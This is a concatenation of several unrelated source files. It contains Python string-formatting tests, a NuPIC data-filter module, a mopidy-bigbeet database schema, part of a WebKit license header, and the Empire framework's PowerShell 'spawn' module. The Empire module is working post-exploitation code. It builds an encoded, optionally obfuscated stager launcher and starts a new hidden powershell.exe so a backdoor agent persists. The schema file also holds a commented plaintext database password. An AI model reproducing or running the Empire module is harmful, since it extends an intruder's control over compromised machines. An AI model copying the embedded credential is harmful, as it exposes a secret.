def f():
yield 4 + ""
self.fixtype(' ').join(f())
except TypeError, e:
if '+' not in str(e):
self.fail('join() ate exception message')
else:
self.fail('exception not raised')
def test_formatting(self):
self.checkequal('+hello+', '+%s+', '__mod__', 'hello')
self.checkequal('+10+', '+%d+', '__mod__', 10)
self.checkequal('a', "%c", '__mod__', "a")
self.checkequal('a', "%c", '__mod__', "a")
self.checkequal('"', "%c", '__mod__', 34)
self.checkequal('$', "%c", '__mod__', 36)
self.checkequal('10', "%d", '__mod__', 10)
self.checkequal('\x7f', "%c", '__mod__', 0x7f)
for ordinal in (-100, 0x200000):
# unicode raises ValueError, str raises OverflowError
self.checkraises((ValueError, OverflowError), '%c', '__mod__', ordinal)
longvalue = sys.maxint + 10L
slongvalue = str(longvalue)
if slongvalue[-1] in ("L","l"): slongvalue = slongvalue[:-1]
self.checkequal(' 42', '%3ld', '__mod__', 42)
self.checkequal('42', '%d', '__mod__', 42L)
self.checkequal('42', '%d', '__mod__', 42.0)
self.checkequal(slongvalue, '%d', '__mod__', longvalue)
self.checkcall('%d', '__mod__', float(longvalue))
self.checkequal('0042.00', '%07.2f', '__mod__', 42)
self.checkequal('0042.00', '%07.2F', '__mod__', 42)
self.checkraises(TypeError, 'abc', '__mod__')
self.checkraises(TypeError, '%(foo)s', '__mod__', 42)
self.checkraises(TypeError, '%s%s', '__mod__', (42,))
self.checkraises(TypeError, '%c', '__mod__', (None,))
self.checkraises(ValueError, '%(foo', '__mod__', {})
self.checkraises(TypeError, '%(foo)s %(bar)s', '__mod__', ('foo', 42))
self.checkraises(TypeError, '%d', '__mod__', "42") # not numeric
self.checkraises(TypeError, '%d', '__mod__', (42+0j)) # no int/long conversion provided
# argument names with properly nested brackets are supported
self.checkequal('bar', '%((foo))s', '__mod__', {'(foo)': 'bar'})
# 100 is a magic number in PyUnicode_Format, this forces a resize
self.checkequal(103*'a'+'x', '%sx', '__mod__', 103*'a')
self.checkraises(TypeError, '%*s', '__mod__', ('foo', 'bar'))
self.checkraises(TypeError, '%10.*f', '__mod__', ('foo', 42.))
self.checkraises(ValueError, '%10', '__mod__', (42,))
width = int(_testcapi.PY_SSIZE_T_MAX + 1)
if width <= sys.maxint:
self.checkraises(OverflowError, '%*s', '__mod__', (width, ''))
prec = int(_testcapi.INT_MAX + 1)
if prec <= sys.maxint:
self.checkraises(OverflowError, '%.*f', '__mod__', (prec, 1. / 7))
# Issue 15989
width = int(1 << (_testcapi.PY_SSIZE_T_MAX.bit_length() + 1))
if width <= sys.maxint:
self.checkraises(OverflowError, '%*s', '__mod__', (width, ''))
prec = int(_testcapi.UINT_MAX + 1)
if prec <= sys.maxint:
self.checkraises(OverflowError, '%.*f', '__mod__', (prec, 1. / 7))
class X(object): pass
self.checkraises(TypeError, 'abc', '__mod__', X())
class X(Exception):
def __getitem__(self, k):
return k
self.checkequal('melon apple', '%(melon)s %(apple)s', '__mod__', X())
def test_floatformatting(self):
# float formatting
for prec in xrange(100):
format = '%%.%if' % prec
value = 0.01
for x in xrange(60):
value = value * 3.14159265359 / 3.0 * 10.0
self.checkcall(format, "__mod__", value)
def test_inplace_rewrites(self):
# Check that strings don't copy and modify cached single-character strings
self.checkequal('a', 'A', 'lower')
self.checkequal(True, 'A', 'isupper')
self.checkequal('A', 'a', 'upper')
self.checkequal(True, 'a', 'islower')
self.checkequal('a', 'A', 'replace', 'A', 'a')
self.checkequal(True, 'A', 'isupper')
self.checkequal('A', 'a', 'capitalize')
self.checkequal(True, 'a', 'islower')
self.checkequal('A', 'a', 'swapcase')
self.checkequal(True, 'a', 'islower')
self.checkequal('A', 'a', 'title')
self.checkequal(True, 'a', 'islower')
def test_partition(self):
self.checkequal(('this is the par', 'ti', 'tion method'),
'this is the partition method', 'partition', 'ti')
# from raymond's original specification
S = 'http://www.python.org'
self.checkequal(('http', '://', 'www.python.org'), S, 'partition', '://')
self.checkequal(('http://www.python.org', '', ''), S, 'partition', '?')
self.checkequal(('', 'http://', 'www.python.org'), S, 'partition', 'http://')
self.checkequal(('http://www.python.', 'org', ''), S, 'partition', 'org')
self.checkraises(ValueError, S, 'partition', '')
self.checkraises(TypeError, S, 'partition', None)
# mixed use of str and unicode
self.assertEqual('a/b/c'.partition(u'/'), ('a', '/', 'b/c'))
def test_rpartition(self):
self.checkequal(('this is the rparti', 'ti', 'on method'),
'this is the rpartition method', 'rpartition', 'ti')
# from raymond's original specification
S = 'http://www.python.org'
self.checkequal(('http', '://', 'www.python.org'), S, 'rpartition', '://')
self.checkequal(('', '', 'http://www.python.org'), S, 'rpartition', '?')
self.checkequal(('', 'http://', 'www.python.org'), S, 'rpartition', 'http://')
self.checkequal(('http://www.python.', 'org', ''), S, 'rpartition', 'org')
self.checkraises(ValueError, S, 'rpartition', '')
self.checkraises(TypeError, S, 'rpartition', None)
# mixed use of str and unicode
self.assertEqual('a/b/c'.rpartition(u'/'), ('a/b', '/', 'c'))
def test_none_arguments(self):
# issue 11828
s = 'hello'
self.checkequal(2, s, 'find', 'l', None)
self.checkequal(3, s, 'find', 'l', -2, None)
self.checkequal(2, s, 'find', 'l', None, -2)
self.checkequal(0, s, 'find', 'h', None, None)
self.checkequal(3, s, 'rfind', 'l', None)
self.checkequal(3, s, 'rfind', 'l', -2, None)
self.checkequal(2, s, 'rfind', 'l', None, -2)
self.checkequal(0, s, 'rfind', 'h', None, None)
self.checkequal(2, s, 'index', 'l', None)
self.checkequal(3, s, 'index', 'l', -2, None)
self.checkequal(2, s, 'index', 'l', None, -2)
self.checkequal(0, s, 'index', 'h', None, None)
self.checkequal(3, s, 'rindex', 'l', None)
self.checkequal(3, s, 'rindex', 'l', -2, None)
self.checkequal(2, s, 'rindex', 'l', None, -2)
self.checkequal(0, s, 'rindex', 'h', None, None)
self.checkequal(2, s, 'count', 'l', None)
self.checkequal(1, s, 'count', 'l', -2, None)
self.checkequal(1, s, 'count', 'l', None, -2)
self.checkequal(0, s, 'count', 'x', None, None)
self.checkequal(True, s, 'endswith', 'o', None)
self.checkequal(True, s, 'endswith', 'lo', -2, None)
self.checkequal(True, s, 'endswith', 'l', None, -2)
self.checkequal(False, s, 'endswith', 'x', None, None)
self.checkequal(True, s, 'startswith', 'h', None)
self.checkequal(True, s, 'startswith', 'l', -2, None)
self.checkequal(True, s, 'startswith', 'h', None, -2)
self.checkequal(False, s, 'startswith', 'x', None, None)
def test_find_etc_raise_correct_error_messages(self):
# issue 11828
s = 'hello'
x = 'x'
self.assertRaisesRegexp(TypeError, r'\bfind\b', s.find,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\brfind\b', s.rfind,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\bindex\b', s.index,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\brindex\b', s.rindex,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'^count\(', s.count,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'^startswith\(', s.startswith,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'^endswith\(', s.endswith,
x, None, None, None)
class MixinStrStringUserStringTest:
# Additional tests for 8bit strings, i.e. str, UserString and
# the string module
def test_maketrans(self):
self.assertEqual(
''.join(map(chr, xrange(256))).replace('abc', 'xyz'),
string.maketrans('abc', 'xyz')
)
self.assertRaises(ValueError, string.maketrans, 'abc', 'xyzw')
def test_translate(self):
table = string.maketrans('abc', 'xyz')
self.checkequal('xyzxyz', 'xyzabcdef', 'translate', table, 'def')
table = string.maketrans('a', 'A')
self.checkequal('Abc', 'abc', 'translate', table)
self.checkequal('xyz', 'xyz', 'translate', table)
self.checkequal('yz', 'xyz', 'translate', table, 'x')
self.checkequal('yx', 'zyzzx', 'translate', None, 'z')
self.checkequal('zyzzx', 'zyzzx', 'translate', None, '')
self.checkequal('zyzzx', 'zyzzx', 'translate', None)
self.checkraises(ValueError, 'xyz', 'translate', 'too short', 'strip')
self.checkraises(ValueError, 'xyz', 'translate', 'too short')
class MixinStrUserStringTest:
# Additional tests that only work with
# 8bit compatible object, i.e. str and UserString
if test_support.have_unicode:
def test_encoding_decoding(self):
codecs = [('rot13', 'uryyb jbeyq'),
('base64', 'aGVsbG8gd29ybGQ=\n'),
('hex', '68656c6c6f20776f726c64'),
('uu', 'begin 666 <data>\n+:&5L;&\\@=V]R;&0 \n \nend\n')]
for encoding, data in codecs:
self.checkequal(data, 'hello world', 'encode', encoding)
self.checkequal('hello world', data, 'decode', encoding)
# zlib is optional, so we make the test optional too...
try:
import zlib
except ImportError:
pass
else:
data = 'x\x9c\xcbH\xcd\xc9\xc9W(\xcf/\xcaI\x01\x00\x1a\x0b\x04]'
self.checkequal(data, 'hello world', 'encode', 'zlib')
self.checkequal('hello world', data, 'decode', 'zlib')
self.checkraises(TypeError, 'xyz', 'decode', 42)
self.checkraises(TypeError, 'xyz', 'encode', 42)
class MixinStrUnicodeTest:
# Additional tests that only work with str and unicode.
def test_bug1001011(self):
# Make sure join returns a NEW object for single item sequences
# involving a subclass.
# Make sure that it is of the appropriate type.
# Check the optimisation still occurs for standard objects.
t = self.type2test
class subclass(t):
pass
s1 = subclass("abcd")
s2 = t().join([s1])
self.assertTrue(s1 is not s2)
self.assertTrue(type(s2) is t)
s1 = t("abcd")
s2 = t().join([s1])
self.assertTrue(s1 is s2)
# Should also test mixed-type join.
if t is unicode:
s1 = subclass("abcd")
s2 = "".join([s1])
self.assertTrue(s1 is not s2)
self.assertTrue(type(s2) is t)
s1 = t("abcd")
s2 = "".join([s1])
self.assertTrue(s1 is s2)
elif t is str:
s1 = subclass("abcd")
s2 = u"".join([s1])
self.assertTrue(s1 is not s2)
self.assertTrue(type(s2) is unicode) # promotes!
s1 = t("abcd")
s2 = u"".join([s1])
self.assertTrue(s1 is not s2)
self.assertTrue(type(s2) is unicode) # promotes!
else:
self.fail("unexpected type for MixinStrUnicodeTest %r" % t)
| mit |
passiweinberger/nupic | src/nupic/data/filters.py | 34 | 4194 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from datetime import datetime, timedelta
class AutoResetFilter(object):
"""Initial implementation of auto-reset is fairly simple. You just give it a
time interval. Like aggregation, we the first time period start with the
time of the first record (t0) and signal a reset at the first record on or after
t0 + interval, t0 + 2 * interval, etc.
We could get much fancier than this, but it is not clear what will be
needed. For example, if you want a reset every day, you might expect the
period to start at midnight. We also don't handle variable-time periods --
month and year.
"""
def __init__(self, interval=None, datetimeField=None):
self.setInterval(interval, datetimeField)
def setInterval(self, interval=None, datetimeField=None):
if interval is not None:
assert isinstance(interval, timedelta)
self.interval = interval
self.datetimeField = datetimeField
self.lastAutoReset = None
def process(self, data):
if self.interval is None:
return True # no more data needed
if self.datetimeField is None:
self._getDatetimeField(data)
date = data[self.datetimeField]
if data['_reset'] != 0:
self.lastAutoReset = date
return True # no more data needed
if self.lastAutoReset is None:
self.lastAutoReset = date
return True
if date >= self.lastAutoReset + self.interval:
# might have skipped several intervals
while date >= self.lastAutoReset + self.interval:
self.lastAutoReset += self.interval
data['_reset'] = 1
return True # no more data needed
elif date < self.lastAutoReset:
# sequence went back in time!
self.lastAutoReset = date
return True
def _getDatetimeField(self, data):
datetimeField = None
assert isinstance(data, dict)
for (name, value) in data.items():
if isinstance(value, datetime):
datetimeField = name
break
if datetimeField is None:
raise RuntimeError("Autoreset requested for the data but there is no date field")
self.datetimeField = datetimeField
def getShortName(self):
if interval is not None:
s = "autoreset_%d_%d" % (interval.days, interval.seconds)
else:
s = "autoreset_none"
return s
class DeltaFilter(object):
def __init__(self, origField, deltaField):
"""Add a delta field to the data.
"""
self.origField = origField
self.deltaField = deltaField
self.previousValue = None
self.rememberReset = False
def process(self, data):
val = data[self.origField]
if self.previousValue is None or data['_reset']:
self.previousValue = val
self.rememberReset = data['_reset']
return False
# We have a delta
delta = val - self.previousValue
self.previousValue = val
if isinstance(delta, timedelta):
data[self.deltaField] = float(delta.days * 24 * 3600) + \
float(delta.seconds) + float(delta.microseconds) * 1.0e-6
else:
data[self.deltaField] = float(delta)
if self.rememberReset:
data['_reset'] = 1
self.rememberReset = False
return True
def getShortName(self):
return "delta_%s" % self.origField
| agpl-3.0 |
rawdlite/mopidy-bigbeet | mopidy_bigbeet/schema/schema.py | 1 | 18040 | from __future__ import unicode_literals
import logging
import os.path
import sys
from os import listdir
from mopidy_bigbeet import Extension
from mopidy_bigbeet.schema import beet_schema, genre_schema
from peewee import *
from playhouse.apsw_ext import APSWDatabase, DateTimeField
user_version = 1
# database = SqliteDatabase(None, pragmas=(
# ('journal_mode', 'WAL'),
# ('user_version', user_version)
# ))
# database = MySQLDatabase('bigbeet', user='rails_user', passwd='tequila'
# charset='utf8mb4')
logger = logging.getLogger(__name__)
bdb = None
gdb = None
data_dir = None
database = APSWDatabase(None,
pragmas=(
('foreign_keys', 'ON'),
('temp_store', 2),
('journal_mode', 'WAL'),
('user_version', user_version)
))
unwanted = [u'_',u'1',u'2',u'3',u'4',u'5',u'6',u'7',u'8',u'9',u'0',u' ',u'!',u'"',u'.',u'<']
def _initialize(config):
global bdb
global gdb
global data_dir
data_dir = config['bigbeet']['bb_data_dir'] #|| Extension.get_data_dir(config)
if not os.path.exists(data_dir):
os.makedirs(data_dir)
bdb = beet_schema.BeetsLibrary(config['bigbeet']['beetslibrary']).lib
gdb = genre_schema.GenreTree(data_dir)
db_path = os.path.join(data_dir, b'bb_library.db')
_connect_db(db_path)
def setup_db():
#import pdb; pdb.set_trace()
try:
database.drop_tables(
[Genre, AlbumGroup, Album, ArtistSecondaryGenre, Artist, Label, SecondaryGenre, SchemaMigration, Track, UserTag, TrackTag])
except:
pass
for modell in [Genre, AlbumGroup, Album, Artist, Label, SchemaMigration, Track, UserTag, TrackTag]:
modell.create_table()
SchemaMigration.create(version = '20180818' )
def _connect_db(db_path):
global database
db_existed = os.path.isfile(db_path)
database.init(db_path)
if not db_existed:
setup_db()
try:
database.connect()
except:
pass
#_migrate_db()
def _migrate_db():
migrations = listdir(os.path.join(
os.path.dirname(__file__), '..', 'db', 'migrations'))
migrations = set((m.split('.')[0] for m in migrations if m.startswith(u'migration')))
versions = [v.version for v in SchemaMigration.select()]
for migration in migrations:
if not migration.split('_')[1] in versions:
modul_name = 'mopidy_bigbeet.db.migrations.' + migration
mig_object = __import__(modul_name,
globals(),
locals(),
[migration],
-1)
mig = mig_object.Migration(database=database)
# import pdb; pdb.set_trace()
mig.migrate_db()
mig.update_db()
def check_genres(config):
_initialize(config)
albums = bdb.albums()
for album in albums:
gdb.find_missing(album['genre'])
for item in bdb.items():
gdb.find_missing(album['genre'])
with open(os.path.join(data_dir, 'genres-missing.txt'), 'w') as outfile:
for mg in set(gdb.genres_missing):
print mg
outfile.write(mg + '\n')
print set(gdb.genres_missing)
def _sync_beets_item(track, item):
track.name = item.title
track.path = item.path
track.acoustid_fingerprint = item.acoustid_fingerprint
track.acoustid = item.acoustid_id
track.added = item.added
if item.singleton:
track.album = None
else:
bdb_album = item.get_album()
if bdb_album:
track.album = Album.get(beets_id=item.get_album().id)
track.artist = item.artist
track.asin = item.asin
track.bitdepth = item.bitdepth
track.bitrate = item.bitrate
track.beets_id = item.id
track.bpm = item.bpm
track.channels = item.channels
track.comments = item.comments
track.composer = item.composer
track.country = item.country
track.day = item.day
track.disc = item.disc
track.encoder = item.encoder
track.format = item.format
track.genre = item.genre
track.grouping = item.grouping
track.language = item.language
track.length = item.length
track.mb_releasegroupid = item.mb_releasegroupid
track.mb_trackid = item.mb_trackid
track.media = item.media
track.month = item.month
track.mtime = item.mtime
track.original_day = item.original_day
track.original_month = item.original_month
track.original_year = item.original_year
track.samplerate = item.samplerate
track.track = item.track
track.year = item.year
_sync_usertags(item, track)
track.save()
def _sync_usertags(item, track):
bb_usertags = [i.tag.name for i in track.tracktag_set]
if hasattr(item, 'usertags'):
usertags = item.usertags.split('|')
else:
usertags = []
missing_usertags = [i for i in usertags if i not in bb_usertags]
delete_usertags = [i for i in bb_usertags if i not in usertags]
# import pdb; pdb.set_trace()
if set(bb_usertags) == set(usertags):
# Nothing to sync
return
elif missing_usertags:
for tag_str in missing_usertags:
tag, created = UserTag.get_or_create(name=tag_str)
TrackTag.get_or_create(track=track, tag=tag)
elif delete_usertags:
for tag_str in delete_usertags:
usertag = UserTag.select().where(UserTag.name == tag_str)[0]
usertag.delete_instance(recursive=True)
def _sync_beets_album(album, bdb_album):
genre_name = bdb_album.genre or '_Unknown'
genre = _set_genre(genre_name)
try:
artist, created = Artist.get_or_create(
name=(bdb_album.albumartist or '_Unknown'),
mb_albumartistid=bdb_album.mb_albumartistid)
except:
# import pdb; pdb.set_trace()
if bdb_album.mb_albumartistid:
artist, created = Artist.get_or_create(mb_albumartistid=bdb_album.mb_albumartistid)
else:
artist, created = Artist.get_or_create(name=(bdb_album.albumartist or '_Unknown'))
artist.country = bdb_album.country
artist.albumartist_sort = bdb_album.albumartist_sort
artist.albumartist_credit = bdb_album.albumartist_credit
artist.albumartist_initial = _get_artist_initial(artist)
artist.genre = genre
artist.save()
label, created = Label.get_or_create(name = (bdb_album.label or '_Unknown'))
album_group, created = AlbumGroup.get_or_create(
name = (bdb_album.albumtype or '_Unknown'))
album.name = bdb_album.album
album.mb_albumid = bdb_album.mb_albumid or None
album.label = label
album.artist = artist
album.album_group = album_group
album.albumstatus = bdb_album.albumstatus
album.beets_id = bdb_album.id
album.catalognum = bdb_album.catalognum
album.comp = bdb_album.comp
album.day = bdb_album.day
album.disctotal = bdb_album.disctotal
album.genre = genre
album.language = bdb_album.language
album.mb_releasegroupid = bdb_album.mb_releasegroupid
album.month = bdb_album.month
album.original_day = bdb_album.original_day
album.original_month = bdb_album.original_month
album.original_year = bdb_album.original_year
album.tracktotal = len(bdb_album.items())
album.year = bdb_album.year
try:
album.art_url = bdb_album.art_url
except:
logger.debug(u'Album has no art_url field yet: %s', album.name)
try:
album.save()
except:
import pdb;
pdb.set_trace()
def _get_artist_initial(artist):
if artist.albumartist_sort:
return [i for i in artist.albumartist_sort if i not in unwanted][0].upper()
elif artist.name:
return [i for i in artist.name if i not in unwanted][0].upper()
else:
return u'-'
def _set_genre(genre_name):
genres = gdb.find_parents(genre_name)
parent_id = None
while genres:
genre_name = genres.pop()
genre, created = Genre.get_or_create(name=genre_name,
parent=parent_id)
parent_id = genre.id
return genre
def item_update(config,item_id):
_initialize(config)
item = bdb.get_item(item_id)
if item:
track, created = Track.get_or_create(beets_id=item_id)
_sync_beets_item(track, item)
logger.info(u'Track synced')
else:
tracks = Track.select().where(Track.beets_id == item_id)
for track in tracks:
logger.info(u'Track deleted: %s in %s', track.name, str(track.path))
track.delete_instance()
def album_update(config,album_id):
_initialize(config)
bdb_album = bdb.get_album(album_id)
if bdb_album:
# import pdb; pdb.set_trace()
album, created = Album.get_or_create(beets_id=bdb_album.id)
_sync_beets_album(album, bdb_album)
logger.info(u'Album synced: %s', album.name)
else:
albums = Album.select().where(Album.beets_id == album_id)
for album in albums:
artist = album.artist
label = album.label
album_group = album.album_group
for track in album.track_set:
track.delete_instance()
album.delete_instance()
logger.info(u'Album deleted: %s', album.name)
if artist:
genre = artist.genre
if artist and not artist.albums:
artist.delete_instance()
if label and not label.albums:
label.delete_instance()
if album_group and not album_group.albums:
album_group.delete_instance()
if not genre.artists and not Genre.select().where(Genre.parent == genre.id):
genre.delete_instance()
def _delete_orphans():
albums = Album.select()
for album in albums:
if not album.track_set:
album.delete_instance()
artists = Artist.select()
for artist in artists:
if not artist.albums:
artist.delete_instance()
genres = Genre.select()
for genre in genres:
if not genre.artists:
genre.delete()
labels = Label.select()
for label in labels:
if not label.albums:
label.delete_instance()
album_groups = AlbumGroup.select()
for album_group in album_groups:
if not album_group.albums:
album_group.delete_instance()
def update(config):
_initialize(config)
# import pdb; pdb.set_trace()
_delete_orphans()
for item in bdb.items(u'singleton:true'):
logger.info("update: %s", item.path)
track, created = Track.get_or_create(beets_id=item.id)
_sync_beets_item(track, item)
def _fix_mtime(config):
_initialize(config)
items = bdb.items()
with open(os.path.join(data_dir, 'files-missing.txt'), 'w') as outfile:
for item in items:
if os.path.isfile(item.path):
item.mtime = item.current_mtime()
item.store()
else:
print(u"missing %s", item.path)
# import pdb; pdb.set_trace()
item.remove(False,True)
tracks = Track.select().where(Track.path == item.path)
for track in tracks:
album = track.album
artist = album.artist
genre = artist.genre
track.delete_instance()
if not album.track_set:
album.delete_instance()
if not artist.albums:
artist.delete_instance()
if not genre.artists:
genre.delete_instance()
outfile.write(item.path + '\n')
def scan(config):
_initialize(config)
# import pdb; pdb.set_trace()
from beets import dbcore
id_sort = dbcore.query.FixedFieldSort(u"id", True)
for bdb_album in bdb.albums(sort = id_sort):
try:
print("%s - %s" % (bdb_album.id, bdb_album.album.encode('utf-8')))
except:
pass
#import pdb; pdb.set_trace()
album, created = Album.get_or_create(beets_id=bdb_album.id)
_sync_beets_album(album, bdb_album)
for item in bdb_album.items():
track, created = Track.get_or_create(beets_id=item.id)
_sync_beets_item(track, item)
for item in bdb.items(u'singleton:true'):
track, created = Track.get_or_create(beets_id=item.id)
_sync_beets_item(track, item)
_delete_orphans()
def _find_children(genre, children):
logger.info("called with {0}".format(genre.name))
childs = [c for c in Genre.select().where(Genre.parent == genre.id)]
children += childs
for child in childs:
_find_children(child, children)
return children
class BaseModel(Model):
created_at = DateTimeField(null=True)
updated_at = DateTimeField(null=True)
class Meta:
database = database
class AlbumGroup(BaseModel):
name = CharField(null=True) # varchar
class Meta:
db_table = 'album_groups'
class Genre(BaseModel):
name = CharField(null=True, unique=True) # varchar
parent = IntegerField(null=True)
class Meta:
db_table = 'genres'
class Label(BaseModel):
name = CharField(null=True) # varchar
class Meta:
db_table = 'labels'
class Artist(BaseModel):
albumartist_credit = TextField(null=True)
albumartist_sort = CharField(null=True) # varchar
country = CharField(null=True) # varchar
genre = ForeignKeyField(Genre, related_name='artists', db_column='genre_id', null=True)
mb_albumartistid = CharField(null=True, unique=True) # varchar
name = CharField(null=True, unique=True) # varchar
albumartist_initial = CharField(null=True) # varchar
class Meta:
db_table = 'artists'
class Album(BaseModel):
added = FloatField(null=True) # float
album_group = ForeignKeyField(AlbumGroup, related_name='albums', db_column='album_group_id', null=True)
albumstatus = CharField(null=True) # varchar
artist = ForeignKeyField(Artist, related_name='albums', db_column='artist_id', null=True)
beets_id = IntegerField(null=True, unique=True)
catalognum = CharField(null=True) # varchar
art_url = CharField(null=True) # varchar
comp = IntegerField(null=True)
day = IntegerField(null=True)
disctotal = IntegerField(null=True)
genre = ForeignKeyField(Genre, related_name='albums', db_column='genre_id', null=True)
label = ForeignKeyField(Label, related_name='albums', db_column='label_id', null=True)
language = CharField(null=True) # varchar
mb_albumid = CharField(null=True, unique=True) # varchar
# mb_albumartistid
mb_releasegroupid = CharField(null=True) # varchar
month = IntegerField(null=True)
name = CharField(null=True) # varchar
tracktotal = IntegerField(null=True)
original_day = IntegerField(null=True)
original_month = IntegerField(null=True)
original_year = IntegerField(null=True)
year = IntegerField(null=True)
class Meta:
db_table = 'albums'
# class SecondaryGenre(BaseModel):
# name = CharField(null=True) # varchar
# class Meta:
# db_table = 'secondary_genres'
# class ArtistSecondaryGenre(BaseModel):
# artist = ForeignKeyField(Artist, db_column='artist_id', null=True)
# position = IntegerField(null=True)
# secondary_genre = ForeignKeyField(SecondaryGenre, db_column='secondary_genre_id', null=True)
# class Meta:
# db_table = 'artist_secondary_genres'
class SchemaMigration(BaseModel):
version = CharField(primary_key=True) # varchar
class Meta:
db_table = 'schema_migrations'
class UserTag(BaseModel):
name = CharField(unique=True) # varchar
class Meta:
db_table = 'user_tags'
class Track(BaseModel):
acoustid_fingerprint = CharField(null=True) # varchar
acoustid = CharField(db_column='acoustid_id', null=True) # varchar
added = FloatField(null=True) # float
album = ForeignKeyField(Album, db_column='album_id', null=True)
artist = CharField(null=True) # varchar
asin = CharField(null=True) # varchar
bitdepth = IntegerField(null=True)
bitrate = IntegerField(null=True)
beets_id = IntegerField(null=True)
bpm = IntegerField(null=True)
channels = IntegerField(null=True)
comments = CharField(null=True) # varchar
composer = CharField(null=True) # varchar
country = CharField(null=True) # varchar
day = IntegerField(null=True)
disc = IntegerField(null=True)
encoder = CharField(null=True) # varchar
format = CharField(null=True) # varchar
genre = CharField(null=True) # varchar
grouping = CharField(null=True) # varchar
language = CharField(null=True) # varchar
length = FloatField(null=True) # float
# mb_artistid = CharField(null=True)
# mb_albumartistid = CharField(null=True)
mb_releasegroupid = CharField(null=True) # varchar
mb_trackid = CharField(null=True) # varchar
media = CharField(null=True) # varchar
month = IntegerField(null=True)
mtime = FloatField(null=True) # float
name = CharField(null=True) # varchar
original_day = IntegerField(null=True)
original_month = IntegerField(null=True)
original_year = IntegerField(null=True)
path = BlobField(null=True)
samplerate = IntegerField(null=True)
track = IntegerField(null=True)
year = IntegerField(null=True)
class Meta:
db_table = 'tracks'
class TrackTag(BaseModel):
track = ForeignKeyField(Track, db_column='track_id', null=False)
tag = ForeignKeyField(UserTag, db_column='user_tag_id', null=False)
class Meta:
indexes = (
(('tag', 'track'), True),
)
db_table = 'track_tags'
| apache-2.0 |
adaptivethreat/Empire | lib/modules/powershell/management/spawn.py | 10 | 3899 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Spawn',
'Author': ['@harmj0y'],
'Description': ('Spawns a new agent in a new powershell.exe process.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'SysWow64' : {
'Description' : 'Switch. Spawn a SysWow64 (32-bit) powershell.exe.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# extract all of our options
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
sysWow64 = self.options['SysWow64']['Value']
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
if sysWow64.lower() == "true":
stagerCode = "$Env:SystemRoot\\SysWow64\\WindowsPowershell\\v1.0\\" + launcher
else:
stagerCode = "$Env:SystemRoot\\System32\\WindowsPowershell\\v1.0\\" + launcher
parts = stagerCode.split(" ")
code = "Start-Process -NoNewWindow -FilePath \"%s\" -ArgumentList '%s'; 'Agent spawned to %s'" % (parts[0], " ".join(parts[1:]), listenerName)
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, psScript=code, obfuscationCommand=obfuscationCommand)
return code
| bsd-3-clause |
mattvick/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/net/web.py | 194 | 1811 | # Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
